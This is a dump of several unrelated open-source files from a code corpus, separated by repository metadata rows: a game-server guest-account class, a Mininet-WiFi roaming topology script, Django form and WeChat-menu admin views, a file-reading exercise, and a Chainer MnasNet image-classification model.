% (char.key, ", ".join(char.permissions.all())))
else:
# character is "free to puppet"
result.append("\n - %s [%s]" % (char.key, ", ".join(char.permissions.all())))
look_string = ("-" * 68) + "\n" + "".join(result) + "\n" + ("-" * 68)
return look_string
class DefaultGuest(DefaultAccount):
    """
    This class is used for guest logins. Unlike Accounts, Guests and
    their characters are deleted after disconnection.
    """
    def at_post_login(self, session=None, **kwargs):
        """
        In theory, guests only have one character regardless of which
        MULTISESSION_MODE we're in. They don't get a choice.
        Args:
            session (Session, optional): Session connecting.
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        self._send_to_connect_channel("|G%s connected|n" % self.key)
        # guests always auto-puppet their single (last-used) character
        self.puppet_object(session, self.db._last_puppet)
    def at_server_shutdown(self):
        """
        We repeat the character-deleting part of `at_post_disconnect()`
        here just to be on the safe side.
        """
        super(DefaultGuest, self).at_server_shutdown()
        characters = self.db._playable_characters
        for character in characters:
            if character:
                # NOTE(review): Python 2 print statement - this module
                # predates py3 support.
                print "deleting Character:", character
                character.delete()
    def at_post_disconnect(self, **kwargs):
        """
        Once having disconnected, destroy the guest's characters and
        the guest account itself.
        Args:
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        super(DefaultGuest, self).at_post_disconnect()
        characters = self.db._playable_characters
        for character in characters:
            if character:
                character.delete()
        # guest accounts are throwaway: remove the account as well
        self.delete()
| [
"[email protected]"
] | |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62 | 5faa3f139f30c0d290e327e04e3fd96d61e2aabb | /mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py | 4e0c7e784e0db877764da170ac32d83db2baa977 | [] | no_license | hongyunnchen/reproducible-research | c6dfc3cd3c186b27ab4cf25949470b48d769325a | ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6 | refs/heads/master | 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | #!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
    "Create a network."
    net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )

    print "*** Creating nodes"
    # One dual-radio station; both radios are bonded below so the station
    # keeps connectivity while roaming between APs.
    sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
    h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
    # Three APs on non-overlapping 2.4 GHz channels (1/6/11), spread along x.
    ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
    ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
    ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
    s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
    c1 = net.addController( 'c1', controller=Controller )

    print "*** Configuring wifi nodes"
    net.configureWifiNodes()

    print "*** Associating and Creating links"
    # Wired backbone: every AP uplinks to s4, which also connects h1.
    net.addLink(ap1, s4)
    net.addLink(ap2, s4)
    net.addLink(ap3, s4)
    net.addLink(s4, h1)

    # Enslave both wlan interfaces to a bonding device (mode=3 is the
    # "broadcast" policy per the Linux bonding docs) with a single IP.
    sta1.cmd('modprobe bonding mode=3')
    sta1.cmd('ip link add bond0 type bond')
    sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
    sta1.cmd('ip link set sta1-wlan0 down')
    sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
    sta1.cmd('ip link set sta1-wlan0 master bond0')
    sta1.cmd('ip link set sta1-wlan1 down')
    sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
    sta1.cmd('ip link set sta1-wlan1 master bond0')
    sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
    sta1.cmd('ip link set bond0 up')

    'seed'
    # Fixed seed so the random mobility pattern is reproducible.
    net.seed(12)

    'plotting graph'
    net.plotGraph(max_x=140, max_y=140)

    "*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
    net.startMobility(startTime=0, model='RandomDirection')

    print "*** Starting network"
    net.build()
    c1.start()
    s4.start( [c1] )
    ap1.start( [c1] )
    ap2.start( [c1] )
    ap3.start( [c1] )
    # bond0 now owns the station's IP; drop the per-radio address.
    sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
    # Simple flood/normal forwarding on the backbone switch.
    os.system('ovs-ofctl add-flow s4 actions=normal')

    print "*** Running CLI"
    CLI( net )

    print "*** Stopping network"
    net.stop()
if __name__ == '__main__':
    # Entry point: enable info-level logging, then build and run the topology.
    setLogLevel( 'info' )
    topology()
| [
"[email protected]"
] | |
fc10948d86708b6f47a13b0e303228135646e05a | e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7 | /qytdjg_learning/views/Form.py | f0c4967d53b2ea07c09c61e006a240cff2f1d5c2 | [] | no_license | collinsctk/qytdjg_learning | 4d61a2a236f0bc4bf9be8d999352a8e3c1b87408 | 72a6d6153f6ca6bf9fccad76612450fdaf83d9fd | refs/heads/master | 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# 表单
# 获取客户端请求的相关信息
def requestInfo(request):
    """Render a small HTML summary of the incoming HTTP request.

    Collects path/host/port/scheme information plus the Accept header
    (request.META is a plain dict of all HTTP request headers) and returns
    it as one <br>-separated HttpResponse.
    """
    fragments = [
        'path: %s ' % request.path,
        '<br>host: %s ' % request.get_host(),
        '<br>full_path %s ' % request.get_full_path(),
        '<br>port: %s ' % request.get_port(),
        '<br>https: %s ' % request.is_secure(),
    ]
    try:
        fragments.append('<br>Accept: %s ' % request.META['HTTP_ACCEPT'])
    except KeyError:
        # Header absent from request.META.
        fragments.append('<br>HTTP请求头获取异常')
    return HttpResponse(''.join(fragments))
# 处理表单(Form)提交的数据
def searchForm(request):
    # Renders the empty search form page; no template context is needed.
    return render_to_response('search_form.html')
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# 改进表单
def search(request):
    """Search movies by type and re-render the combined form/results page.

    Missing `name` in the query string re-renders the form with an error
    flag; otherwise the matching movies and the query are passed along.
    """
    name = request.GET.get('name')
    if name is None:
        return render_to_response('search_form_ext.html', {'error': True})
    movies = Movie.objects.filter(type__icontains=name)
    return render_to_response('search_form_ext.html',
                              {'movies': movies, 'query': name})
# 简单的表单校验
def searchVerify1(request):
    """Simple single-flag form validation.

    The movie-type name must be present, non-empty and at most 10
    characters long. On success the result page is rendered; otherwise the
    form is re-rendered with an `error` flag.
    """
    error = False
    if 'name' in request.GET:
        name = request.GET['name']
        # The name field must be non-empty and not too long.
        if not name:
            error = True
        elif len(name) > 10:
            error = True
        else:
            movies = Movie.objects.filter(type__icontains=name)
            return render_to_response('search_form_ext_verify.html',
                                      {'movies': movies, 'query': name})
    # Bug fix: pass the computed flag instead of hard-coded True, so the
    # first (unsubmitted) visit no longer shows a spurious error message.
    return render_to_response('search_form_ext_verify.html', {'error': error})
def searchVerify(request):
    """Form validation that collects human-readable error messages.

    Validates the movie-type name (required, non-empty, <= 10 chars) and
    re-renders the page either with results or with the error list.
    """
    errors = []
    if 'name' not in request.GET:
        # First visit: no submission yet, render with an empty error list.
        return render_to_response('search_form_ext_verify2.html',
                                  {'errors': errors})
    name = request.GET['name']
    if not name:
        errors.append('请输入电影类型名')
    elif len(name) > 10:
        errors.append('电影类型名长度不能大于10')
    else:
        movies = Movie.objects.filter(type__icontains=name)
        return render_to_response('search_form_ext_verify2.html',
                                  {'movies': movies, 'query': name})
    return render_to_response('search_form_ext_verify2.html',
                              {'errors': errors})
# 复杂的表单校验
def searchVerifyad(request):
    """Multi-field form validation that collects all error messages.

    Requires `name`, `value1` and `value2` in the query string; an error
    message is collected for each missing/empty field and the query only
    runs when the whole form is valid.
    """
    errors = []
    if 'name' in request.GET:
        name = request.GET['name']
        # Bug fix: use .get() so a missing field yields a validation
        # message instead of raising MultiValueDictKeyError.
        value1 = request.GET.get('value1', '')
        value2 = request.GET.get('value2', '')
        if not name:
            errors.append('请输入电影类型名')
        if not value1:
            errors.append('必须提供value1')
        if not value2:
            errors.append('必须提供value2')
        if not errors:
            movies = Movie.objects.filter(type__icontains=name)
            # Bug fix: template name was 'search_form_ext_verifad.html',
            # inconsistent with the error branch below.
            return render_to_response('search_form_ext_verifyad.html',
                                      {'movies': movies, 'query': name})
    return render_to_response('search_form_ext_verifyad.html',
                              {'errors': errors})
# 编写Form类
# django.forms.Form
# 在视图中使用Form对象
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# 处理CSRF问题
def contact(request):
    """Handle the contact form with Django's Form class (CSRF-aware).

    GET renders an unbound form pre-filled with defaults; POST validates
    the submission, re-rendering the form on failure.
    """
    if request.method != 'POST':
        # Unbound form with initial values for a fresh page load.
        form = MyForm(initial={'name': '秦柯',
                               'email': '[email protected]',
                               'message': '没有信息'})
        return render(request, 'my_form.html', {'form': form})
    form = MyForm(request.POST)
    if not form.is_valid():
        return render(request, 'my_form.html', {'form': form})
    print('完成与业务相关的工作')
    return HttpResponse('OK')
if __name__ == "__main__":
    # Module only defines Django views; nothing to run when executed directly.
    pass
"[email protected]"
] | |
775c3d99a00861bd1974087e2fe75b1216b73fe6 | 421b0ae45f495110daec64ed98c31af525585c2c | /File_Handling/first_file.py | 53c72b560b6263d87c4f8e3ce01570d86ad5fb4f | [] | no_license | Pradeepsuthar/pythonCode | a2c87fb64c79edd11be54c2015f9413ddce246c4 | 14e2b397f69b3fbebde5b3af98898c4ff750c28c | refs/heads/master | 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
| [
"[email protected]"
] | |
aea70b7bae784283e27efb8fb4f2bc809628cb32 | 9bf62c04522b6b28e4d4bedd25654d0ea675f72a | /wechat_django/admin/views/menu.py | 38ce85ed5fd22d128e4d83ff133787061ea61e5f | [
"MIT"
] | permissive | x2x4com/wechat-django | 9a46cd34c4a00f515e2e315d51d6475e509ad9f0 | 926e5d2ed2895d30a253504ff252a7a52fcfe81f | refs/heads/master | 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
    """Django-admin integration for WeChat custom menus.

    Provides a tree-ish changelist (top menus plus indented sub-menus),
    per-row add/delete shortcuts, and object tools to sync menus from /
    publish menus to the WeChat server.
    """

    __category__ = "menu"
    __model__ = Menu

    changelist_object_tools = ("sync", "publish")
    change_form_template = "admin/wechat_django/menu/change_form.html"
    change_list_template = "admin/wechat_django/menu/change_list.html"

    list_display = (
        "operates", "id", "parent_id", "title", "type", "detail", "weight",
        "updated_at")
    list_display_links = ("title",)
    list_editable = ("weight", )
    fields = (
        "name", "type", "key", "url", "appid", "pagepath", "created_at",
        "updated_at")

    def title(self, obj):
        # Indent sub-menus so the flat changelist reads as a tree.
        if obj.parent:
            return "|--- " + obj.name
        return obj.name
    title.short_description = _("title")

    @mark_safe
    def detail(self, obj):
        # Type-dependent summary column: key for CLICK, a link for VIEW,
        # the appid for MINIPROGRAM; empty otherwise.
        rv = ""
        if obj.type == Menu.Event.CLICK:
            rv = obj.content.get("key")
        elif obj.type == Menu.Event.VIEW:
            rv = '<a href="{0}">{1}</a>'.format(
                obj.content.get("url"), _("link"))
        elif obj.type == Menu.Event.MINIPROGRAM:
            rv = obj.content.get("appid")
        return rv or ""
    detail.short_description = _("detail")

    @mark_safe
    def operates(self, obj):
        # Per-row action column: always a delete link; an "add sub-menu"
        # link only for typeless top-level menus with fewer than 5 children.
        del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
            object_id=obj.id,
            wechat_app_id=obj.app_id
        ))
        rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
        if not obj.parent and not obj.type and obj.sub_button.count() < 5:
            query = dict(parent_id=obj.id)
            add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
                wechat_app_id=obj.app_id
            ))
            add_url = "{0}?{1}".format(add_link, urlencode(query))
            rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
        return rv
    operates.short_description = _("actions")

    @object_tool.confirm(short_description=_("Sync menus"))
    def sync(self, request, obj=None):
        # Pull the menu definition from the WeChat server into the DB.
        self.check_wechat_permission(request, "sync")

        def action():
            Menu.sync(request.app)
            return _("Menus successful synchronized")

        return self._clientaction(
            request, action, _("Sync menus failed with %(exc)s"))

    @object_tool.confirm(short_description=_("Publish menus"))
    def publish(self, request, obj=None):
        # Push the local menu definition to the WeChat server.
        # NOTE(review): permission checked here is "sync", same as above —
        # looks intentional (one shared permission) but worth confirming.
        self.check_wechat_permission(request, "sync")

        def action():
            Menu.publish(request.app)
            return _("Menus successful published")

        return self._clientaction(
            request, action, _("Publish menus failed with %(exc)s"))

    def get_actions(self, request):
        # Bulk delete would bypass WeChat-specific cleanup; remove it.
        actions = super(MenuAdmin, self).get_actions(request)
        if "delete_selected" in actions:
            del actions["delete_selected"]
        return actions

    def get_fields(self, request, obj=None):
        # Timestamps only make sense on existing objects.
        fields = list(super(MenuAdmin, self).get_fields(request, obj))
        if not obj:
            fields.remove("created_at")
            fields.remove("updated_at")
        return fields

    def get_readonly_fields(self, request, obj=None):
        rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
        if obj:
            rv = rv + ("created_at", "updated_at")
        return rv

    def get_queryset(self, request):
        # Without an explicit menuid filter, hide server-synced menus;
        # with ?parent_id=..., narrow to that menu's children.
        rv = super(MenuAdmin, self).get_queryset(request)
        if not get_request_params(request, "menuid"):
            rv = rv.filter(menuid__isnull=True)
        if request.GET.get("parent_id"):
            rv = rv.filter(parent_id=request.GET["parent_id"])
        return rv

    class MenuForm(DynamicChoiceForm):
        # Extra per-type fields are stored in the JSON `content` field;
        # `type` selects which of them are kept (see allowed_fields).
        content_field = "content"
        origin_fields = ("name", "menuid", "type", "weight")
        type_field = "type"

        key = forms.CharField(label=_("menu key"), required=False)
        url = forms.URLField(label=_("url"), required=False)
        appid = forms.CharField(label=_("miniprogram app_id"), required=False)
        pagepath = forms.CharField(label=_("pagepath"), required=False)

        class Meta(object):
            model = Menu
            fields = ("name", "menuid", "type", "weight")

        def allowed_fields(self, type, cleaned_data):
            if type == Menu.Event.VIEW:
                fields = ("url", )
            elif type == Menu.Event.CLICK:
                fields = ("key", )
            elif type == Menu.Event.MINIPROGRAM:
                # NOTE(review): "apppath" does not match the declared form
                # field "pagepath" — looks like a typo; confirm against
                # DynamicChoiceForm's handling before changing.
                fields = ("url", "appid", "apppath")
            else:
                fields = tuple()
            return fields
    form = MenuForm

    def save_model(self, request, obj, form, change):
        # New sub-menus inherit the parent given in the querystring.
        # NOTE(review): bare super() is Python-3-only, unlike the
        # super(MenuAdmin, self) calls elsewhere in this class.
        if not change and request.GET.get("parent_id"):
            obj.parent_id = request.GET["parent_id"]
        return super().save_model(request, obj, form, change)

    def has_add_permission(self, request):
        if not super(MenuAdmin, self).has_add_permission(request):
            return False
        # WeChat limits: at most 5 sub-menus per menu, 3 top-level menus.
        q = self.get_queryset(request)
        if request.GET.get("parent_id"):
            return q.count() < 5
        else:
            return q.filter(parent_id__isnull=True).count() < 3

    def get_model_perms(self, request):
        # Hide the whole model when the app has no menu ability.
        return (super(MenuAdmin, self).get_model_perms(request)
                if request.app.abilities.menus else {})
| [
"[email protected]"
] | |
c70f0f21ddbab3ceb6ab8740dc0a3da2d1b05679 | 8e52c27f1b2823db67db4438b2b7e22c18254eca | /chainer_/chainercv2/models/mnasnet.py | 7fc29a525f9eef9ba2765ae2e02a792b0197b0e0 | [
"MIT"
] | permissive | earhian/imgclsmob | 5582f5f2d4062b620eecc28d5c4c9245fea47291 | c87c0942420876941868c016211073dec4392e4d | refs/heads/master | 2020-04-12T02:13:55.258601 | 2018-12-17T20:38:19 | 2018-12-17T20:38:19 | 162,242,486 | 1 | 0 | MIT | 2018-12-18T06:40:42 | 2018-12-18T06:40:41 | null | UTF-8 | Python | false | false | 13,344 | py | """
MnasNet, implemented in Chainer.
Original paper: 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,' https://arxiv.org/abs/1807.11626.
"""
__all__ = ['MnasNet', 'mnasnet']
import os
import chainer.functions as F
import chainer.links as L
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from .common import SimpleSequential
class ConvBlock(Chain):
    """
    Standard convolution block with Batch normalization and ReLU activation.

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    ksize : int or tuple/list of 2 int
        Convolution window size.
    stride : int or tuple/list of 2 int
        Stride of the convolution.
    pad : int or tuple/list of 2 int
        Padding value for convolution layer.
    groups : int, default 1
        Number of groups.
    activate : bool, default True
        Whether activate the convolution block.
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 ksize,
                 stride,
                 pad,
                 groups=1,
                 activate=True):
        super(ConvBlock, self).__init__()
        self.activate = activate

        with self.init_scope():
            # nobias=True: the following BatchNormalization supplies the
            # per-channel shift, so a conv bias would be redundant.
            self.conv = L.Convolution2D(
                in_channels=in_channels,
                out_channels=out_channels,
                ksize=ksize,
                stride=stride,
                pad=pad,
                nobias=True,
                groups=groups)
            self.bn = L.BatchNormalization(
                size=out_channels,
                eps=1e-5)
            if self.activate:
                self.activ = F.relu

    def __call__(self, x):
        # conv -> batchnorm -> (optional) ReLU
        x = self.conv(x)
        x = self.bn(x)
        if self.activate:
            x = self.activ(x)
        return x
def conv1x1_block(in_channels,
                  out_channels,
                  activate=True):
    """
    1x1 version of the standard convolution block.

    A pointwise ConvBlock: 1x1 kernel, stride 1, no padding, no grouping.

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    activate : bool, default True
        Whether activate the convolution block.
    """
    pointwise_conf = dict(ksize=1, stride=1, pad=0, groups=1)
    return ConvBlock(
        in_channels=in_channels,
        out_channels=out_channels,
        activate=activate,
        **pointwise_conf)
def dwconv_block(in_channels,
                 out_channels,
                 ksize,
                 stride,
                 activate=True):
    """
    Depthwise version of the standard convolution block.

    Uses one convolution group per output channel (depthwise when
    in_channels == out_channels) and 'same'-style padding for odd kernels.

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    ksize : int or tuple/list of 2 int
        Convolution window size.
    stride : int or tuple/list of 2 int
        Stride of the convolution.
    activate : bool, default True
        Whether activate the convolution block.
    """
    same_pad = ksize // 2
    return ConvBlock(
        in_channels=in_channels,
        out_channels=out_channels,
        ksize=ksize,
        stride=stride,
        pad=same_pad,
        groups=out_channels,
        activate=activate)
class DwsConvBlock(Chain):
    """
    Depthwise separable convolution block with BatchNorms and activations
    at each convolution layers.

    A 3x3 depthwise convolution followed by a 1x1 pointwise convolution.

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    """
    def __init__(self,
                 in_channels,
                 out_channels):
        super(DwsConvBlock, self).__init__()
        with self.init_scope():
            self.dw_conv = dwconv_block(
                in_channels=in_channels,
                out_channels=in_channels,
                ksize=3,
                stride=1)
            self.pw_conv = conv1x1_block(
                in_channels=in_channels,
                out_channels=out_channels)

    def __call__(self, x):
        # depthwise (spatial) then pointwise (channel mixing)
        x = self.dw_conv(x)
        x = self.pw_conv(x)
        return x
class MnasUnit(Chain):
    """
    MnasNet unit (inverted residual block: expand -> depthwise -> project).

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    ksize : int or tuple/list of 2 int
        Convolution window size.
    stride : int or tuple/list of 2 int
        Stride of the second convolution layer.
    expansion_factor : int
        Factor for expansion of channels.
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 ksize,
                 stride,
                 expansion_factor):
        super(MnasUnit, self).__init__()
        # Identity shortcut only when shape is preserved.
        self.residual = (in_channels == out_channels) and (stride == 1)
        mid_channels = in_channels * expansion_factor

        with self.init_scope():
            self.conv1 = conv1x1_block(
                in_channels=in_channels,
                out_channels=mid_channels,
                activate=True)
            self.conv2 = dwconv_block(
                in_channels=mid_channels,
                out_channels=mid_channels,
                ksize=ksize,
                stride=stride,
                activate=True)
            # Linear bottleneck: no activation after the projection.
            self.conv3 = conv1x1_block(
                in_channels=mid_channels,
                out_channels=out_channels,
                activate=False)

    def __call__(self, x):
        if self.residual:
            identity = x
        x = self.conv1(x)
        x = self.conv2(x)
        x = self.conv3(x)
        if self.residual:
            x = x + identity
        return x
class MnasInitBlock(Chain):
    """
    MnasNet specific initial block (stem): a stride-2 3x3 convolution
    followed by a depthwise-separable block.

    Parameters:
    ----------
    in_channels : int
        Number of input channels.
    out_channels_list : list of 2 int
        Numbers of output channels.
    """
    def __init__(self,
                 in_channels,
                 out_channels_list):
        super(MnasInitBlock, self).__init__()
        with self.init_scope():
            # Stride 2 halves the spatial resolution right at the input.
            self.conv1 = ConvBlock(
                in_channels=in_channels,
                out_channels=out_channels_list[0],
                ksize=3,
                stride=2,
                pad=1,
                groups=1,
                activate=True)
            self.conv2 = DwsConvBlock(
                in_channels=out_channels_list[0],
                out_channels=out_channels_list[1])

    def __call__(self, x):
        x = self.conv1(x)
        x = self.conv2(x)
        return x
class MnasNet(Chain):
    """
    MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
    https://arxiv.org/abs/1807.11626.

    Parameters:
    ----------
    channels : list of list of int
        Number of output channels for each unit.
    init_block_channels : list of 2 int
        Numbers of output channels for the initial unit.
    final_block_channels : int
        Number of output channels for the final block of the feature extractor.
    ksizes : list of list of int
        Number of kernel sizes for each unit.
    expansion_factors : list of list of int
        Number of expansion factors for each unit.
    in_channels : int, default 3
        Number of input channels.
    in_size : tuple of two ints, default (224, 224)
        Spatial size of the expected input image.
    classes : int, default 1000
        Number of classification classes.
    """
    def __init__(self,
                 channels,
                 init_block_channels,
                 final_block_channels,
                 ksizes,
                 expansion_factors,
                 in_channels=3,
                 in_size=(224, 224),
                 classes=1000):
        super(MnasNet, self).__init__()
        self.in_size = in_size
        self.classes = classes

        with self.init_scope():
            self.features = SimpleSequential()
            with self.features.init_scope():
                setattr(self.features, "init_block", MnasInitBlock(
                    in_channels=in_channels,
                    out_channels_list=init_block_channels))
                in_channels = init_block_channels[-1]
                for i, channels_per_stage in enumerate(channels):
                    ksizes_per_stage = ksizes[i]
                    expansion_factors_per_stage = expansion_factors[i]
                    stage = SimpleSequential()
                    with stage.init_scope():
                        for j, out_channels in enumerate(channels_per_stage):
                            ksize = ksizes_per_stage[j]
                            expansion_factor = expansion_factors_per_stage[j]
                            # Only the first unit of a stage downsamples.
                            stride = 2 if (j == 0) else 1
                            setattr(stage, "unit{}".format(j + 1), MnasUnit(
                                in_channels=in_channels,
                                out_channels=out_channels,
                                ksize=ksize,
                                stride=stride,
                                expansion_factor=expansion_factor))
                            in_channels = out_channels
                    setattr(self.features, "stage{}".format(i + 1), stage)
                setattr(self.features, 'final_block', conv1x1_block(
                    in_channels=in_channels,
                    out_channels=final_block_channels,
                    activate=True))
                in_channels = final_block_channels
                # ksize=7 matches the 7x7 feature map produced from the
                # default 224x224 input — TODO confirm for other in_size.
                setattr(self.features, 'final_pool', partial(
                    F.average_pooling_2d,
                    ksize=7,
                    stride=1))

            self.output = SimpleSequential()
            with self.output.init_scope():
                setattr(self.output, 'flatten', partial(
                    F.reshape,
                    shape=(-1, in_channels)))
                setattr(self.output, 'fc', L.Linear(
                    in_size=in_channels,
                    out_size=classes))

    def __call__(self, x):
        x = self.features(x)
        x = self.output(x)
        return x
def get_mnasnet(model_name=None,
                pretrained=False,
                root=os.path.join('~', '.chainer', 'models'),
                **kwargs):
    """
    Create MnasNet model with specific parameters.

    Parameters:
    ----------
    model_name : str or None, default None
        Model name for loading pretrained model.
    pretrained : bool, default False
        Whether to load the pretrained weights for model.
    root : str, default '~/.chainer/models'
        Location for keeping the model parameters.
    """
    init_block_channels = [32, 16]
    final_block_channels = 1280
    # Per layer-group configuration; groups are merged into stages below.
    layers = [3, 3, 3, 2, 4, 1]
    downsample = [1, 1, 1, 0, 1, 0]
    channels_per_layers = [24, 40, 80, 96, 192, 320]
    expansion_factors_per_layers = [3, 3, 6, 6, 6, 6]
    ksizes_per_layers = [3, 5, 5, 3, 5, 3]
    default_kernel_size = 3

    from functools import reduce

    # Each reduce walks the layer groups: a group with downsample=1 opens a
    # new stage (x + [new list]); downsample=0 appends the group's units to
    # the previous stage (x[:-1] + [x[-1] + ...]). For kernel sizes, only
    # the first unit of a group gets the group's ksize; the remaining units
    # fall back to default_kernel_size.
    channels = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
                      zip(channels_per_layers, layers, downsample), [])
    ksizes = reduce(lambda x, y: x + [[y[0]] + [default_kernel_size] * (y[1] - 1)] if y[2] != 0 else x[:-1] + [
        x[-1] + [y[0]] + [default_kernel_size] * (y[1] - 1)], zip(ksizes_per_layers, layers, downsample), [])
    expansion_factors = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
                               zip(expansion_factors_per_layers, layers, downsample), [])

    net = MnasNet(
        channels=channels,
        init_block_channels=init_block_channels,
        final_block_channels=final_block_channels,
        ksizes=ksizes,
        expansion_factors=expansion_factors,
        **kwargs)

    if pretrained:
        if (model_name is None) or (not model_name):
            raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
        from .model_store import get_model_file
        load_npz(
            file=get_model_file(
                model_name=model_name,
                local_model_store_dir_path=root),
            obj=net)

    return net
def mnasnet(**kwargs):
    """
    MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
    https://arxiv.org/abs/1807.11626.

    Parameters:
    ----------
    pretrained : bool, default False
        Whether to load the pretrained weights for model.
    root : str, default '~/.chainer/models'
        Location for keeping the model parameters.
    """
    # Thin factory wrapper: fixes the registered model name.
    return get_mnasnet(model_name="mnasnet", **kwargs)
def _test():
    """Smoke test: builds the model, checks its parameter count and that a
    forward pass on a zero image yields logits of the expected shape."""
    import numpy as np
    import chainer

    chainer.global_config.train = False
    pretrained = False

    models = [
        mnasnet,
    ]

    for model in models:
        net = model(pretrained=pretrained)
        weight_count = net.count_params()
        print("m={}, {}".format(model.__name__, weight_count))
        # Reference parameter count for the stock configuration.
        assert (model != mnasnet or weight_count == 4308816)

        x = np.zeros((1, 3, 224, 224), np.float32)
        y = net(x)
        assert (y.shape == (1, 1000))


if __name__ == "__main__":
    _test()
| [
"[email protected]"
] | |
